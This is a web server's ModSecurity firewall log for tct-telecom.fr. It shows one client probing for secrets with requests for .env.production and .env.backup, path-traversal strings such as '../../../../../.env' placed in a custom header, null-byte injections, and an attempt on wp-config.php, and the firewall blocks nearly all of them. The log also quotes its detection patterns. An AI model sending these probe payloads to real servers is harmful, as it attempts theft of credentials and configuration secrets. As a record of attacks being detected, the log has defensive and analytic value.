[Tue May 12 04:50:49.508749 2026] [security2:error] [pid 1808852:tid 1808873] [client 93.123.109.165:29722] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViBfeipD4uoG21FolQQAAABI"]
[Tue May 12 04:50:49.561877 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKViTue9Sp-pIv_Bb634AAAAVI"]
[Tue May 12 04:50:49.561974 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKViTue9Sp-pIv_Bb634AAAAVI"]
[Tue May 12 04:50:49.562116 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKViTue9Sp-pIv_Bb634AAAAVI"]
[Tue May 12 04:50:49.671093 2026] [security2:error] [pid 1825179:tid 1825202] [client 93.123.109.165:29804] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agKVidr1yOh9TvizeziSpgAAAEQ"]
[Tue May 12 04:50:49.671222 2026] [security2:error] [pid 1825179:tid 1825202] [client 93.123.109.165:29804] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agKVidr1yOh9TvizeziSpgAAAEQ"]
[Tue May 12 04:50:49.951435 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:29698] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViHo6NvB9WXx5V-6hrQAAAQ4"]
[Tue May 12 04:50:49.955206 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViDue9Sp-pIv_Bb633wAAAU0"]
[Tue May 12 04:50:49.979289 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVidr1yOh9TvizeziSpwAAAEg"], referer: https://tct-telecom.fr/api/health?X-App-Env=%00
[Tue May 12 04:50:49.979336 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVidr1yOh9TvizeziSpwAAAEg"], referer: https://tct-telecom.fr/api/health?X-App-Env=%00
[Tue May 12 04:50:49.979662 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVidr1yOh9TvizeziSpwAAAEg"], referer: https://tct-telecom.fr/api/health?X-App-Env=%00
[Tue May 12 04:50:50.119180 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVidr1yOh9TvizeziSpwAAAEg"], referer: https://tct-telecom.fr/api/health?X-App-Env=%00
[Tue May 12 04:50:50.512419 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.512467 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.512502 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.512699 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.512745 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.512772 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.513204 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.530944 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVitr1yOh9TvizeziSqAAAAEg"]
[Tue May 12 04:50:50.555036 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViTue9Sp-pIv_Bb634AAAAVI"]
[Tue May 12 04:50:50.565405 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.565452 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.565477 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.565674 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.565719 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.565753 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.566171 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.583687 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVitr1yOh9TvizeziSqQAAAEg"]
[Tue May 12 04:50:50.617237 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.617297 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.617324 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.617598 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.617653 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.617687 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.618146 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.627572 2026] [access_compat:error] [pid 1825179:tid 1825206] [client 93.123.109.165:29844] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
